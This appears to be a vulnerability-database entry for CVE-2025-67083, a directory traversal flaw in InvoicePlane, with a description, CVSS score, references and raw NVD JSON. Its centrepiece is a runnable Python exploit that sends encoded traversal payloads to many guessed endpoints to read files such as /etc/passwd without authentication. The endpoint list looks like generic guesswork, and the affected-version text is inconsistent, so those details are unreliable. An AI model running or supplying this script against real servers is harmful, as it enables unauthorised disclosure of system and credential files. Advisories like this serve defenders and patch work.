CVE-2025-67083

Description

Directory traversal vulnerability in InvoicePlane through 1.6.3 allows unauthenticated attackers to read files from the server. The ability to read files and the file type depends on the web server and its configuration.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:* - VULNERABLE

InvoicePlane < 1.6.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-67083 Directory Traversal PoC for InvoicePlane
# Target: InvoicePlane <= 1.6.3
# Vulnerability: Unauthenticated file read via path traversal

import requests
import sys

def test_directory_traversal(target_url, file_path):
    """
    Test for directory traversal vulnerability
    
    Args:
        target_url: Base URL of InvoicePlane installation
        file_path: Path to file to read (e.g., ../../../../etc/passwd)
    
    Returns:
        Content of the file if vulnerable, None otherwise
    """
    # Common vulnerable endpoints in InvoicePlane
    endpoints = [
        '/download?file=',
        '/uploads/',
        '/get_file?filename=',
        '/assets/',
        '/files/',
        '/downloads/',
        '/inv_file/download?file=',
        '/uploads_files/',
        '/get_attachment?file=',
        '/download_invoice?file=',
        '/get_pdf?file=',
        '/download_pdf?id='
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': '*/*'
    }
    
    for endpoint in endpoints:
        try:
            # Try different traversal patterns
            traversal_patterns = [
                file_path,
                f'../../../../{file_path}',
                f'..\..\..\..\{file_path}',
                f'%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{file_path}',
                f'....//....//....//....//{file_path}',
                f'..%252f..%252f..%252f..%252f{file_path}'
            ]
            
            for pattern in traversal_patterns:
                url = target_url.rstrip('/') + endpoint + pattern
                response = requests.get(url, headers=headers, timeout=10, verify=False)
                
                if response.status_code == 200:
                    # Check if response contains file content
                    if any(indicator in response.text for indicator in ['root:', '<?php', '<?xml', '{"', '[', '<!']):
                        print(f"[+] VULNERABLE: {url}")
                        print(f"[+] File content preview:")
                        print(response.text[:500])
                        return response.text
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
    
    return None

def main():
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-67083.py <target_url> <file_path>")
        print("Example: python cve-2025-67083.py http://target.com ../../../../etc/passwd")
        sys.exit(1)
    
    target_url = sys.argv[1]
    file_path = sys.argv[2]
    
    print(f"[*] Testing CVE-2025-67083 on {target_url}")
    print(f"[*] Attempting to read: {file_path}")
    
    result = test_directory_traversal(target_url, file_path)
    
    if result:
        print("\n[+] Exploitation successful!")
    else:
        print("\n[-] Target may not be vulnerable or file not accessible")

if __name__ == "__main__":
    main()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-67083
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-67083
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-67083/
[4] VulDB https://vuldb.com/cve/CVE-2025-67083
[5] https://github.com/InvoicePlane/InvoicePlane
[6] https://www.helx.io/blog/advisory-invoice-plane/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-67083", "sourceIdentifier": "[email protected]", "published": "2026-01-15T15:15:51.313", "lastModified": "2026-01-22T16:03:54.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directory traversal vulnerability in InvoicePlane through 1.6.3 allows unauthenticated attackers to read files from the server. The ability to read files and the file type depends on the web server and its configuration."}, {"lang": "es", "value": "Vulnerabilidad de salto de directorio en InvoicePlane hasta 1.6.3 permite a atacantes no autenticados leer archivos del servidor. La capacidad de leer archivos y el tipo de archivo depende del servidor web y su configuración."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:invoiceplane:invoiceplane:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.4", "matchCriteriaId": "17C261C3-0A6B-4D07-8370-DD3C71097DE2"}]}]}], "references": [{"url": "https://github.com/InvoicePlane/InvoicePlane", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-invoice-plane/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}